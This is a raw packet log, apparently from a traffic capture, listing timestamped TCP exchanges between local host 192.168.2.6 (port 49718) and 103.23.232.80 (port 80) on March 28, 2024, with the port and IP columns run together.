                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190610886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190610886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190655947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190701962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190720081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190737963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190764904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190785885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190802097 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190814972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190824032 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190849066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190864086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190885067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190887928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190905094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190912962 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190947056 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190978050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.190990925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191004992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191019058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191034079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191046953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191051006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191070080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191076994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191091061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191097975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191112995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191135883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191139936 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191152096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191178083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191178083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191215038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191220999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191230059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191266060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191283941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191298008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191312075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191342115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191356897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191359997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191370964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191378117 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191415071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191420078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191436052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191448927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191462040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191488028 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191504002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191514015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191534042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191550016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191575050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191584110 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191605091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191627026 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191648960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191668034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191692114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191715956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191737890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191762924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191767931 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191777945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191802979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191817999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191824913 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191847086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191857100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191884995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191896915 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191900969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191914082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191945076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191945076 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191979885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.191987991 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192014933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192029953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192043066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192059994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192076921 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192095041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192109108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192122936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192146063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192161083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192176104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192207098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192230940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192235947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192241907 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192245007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192287922 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192287922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192303896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192321062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192344904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192363977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192378998 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192395926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192405939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192420959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192435026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192460060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192464113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192487955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192521095 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192536116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192548037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192559004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192559958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192575932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192586899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192621946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192662001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192662001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192681074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192693949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192707062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192709923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192732096 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192743063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192758083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192769051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192787886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192794085 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.192810059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196271896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196296930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196320057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196335077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196351051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196361065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196365118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196397066 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196413994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196432114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196464062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196470976 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196480989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196515083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196520090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196535110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196549892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196563005 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196564913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196588993 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196620941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196638107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196650028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196670055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196676970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196686983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196691990 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196738958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196743011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196772099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196787119 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196800947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196811914 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196842909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196850061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196858883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196888924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196908951 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196926117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196940899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196979046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196983099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.196996927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197030067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197041988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197046041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197062016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197071075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197098970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197099924 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197138071 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197154045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197184086 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197205067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197232008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197247982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197256088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197304010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197319031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197331905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197341919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197360992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197382927 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197402000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197406054 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197448969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197463036 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197475910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197491884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197500944 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197514057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197531939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197540045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197555065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197561979 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197585106 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197599888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197623968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197643995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197654963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197660923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197705030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197712898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197727919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197741032 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197757006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197777033 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197798967 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197799921 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197813988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197829008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197843075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197860003 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197889090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197890997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197911978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197925091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197951078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197981119 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.197994947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198007107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198029041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198040962 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198060036 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198075056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198086977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198101997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198111057 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198144913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198149920 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198160887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198174953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198199034 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198199034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198225975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198247910 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198255062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198297977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198312998 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198327065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198339939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198342085 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198354959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198390961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198391914 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198406935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198420048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198432922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198446989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198458910 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198487043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198510885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198528051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198542118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198561907 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198584080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198601961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198618889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.198633909 CET8049718103.23.232.80192.168.2.6
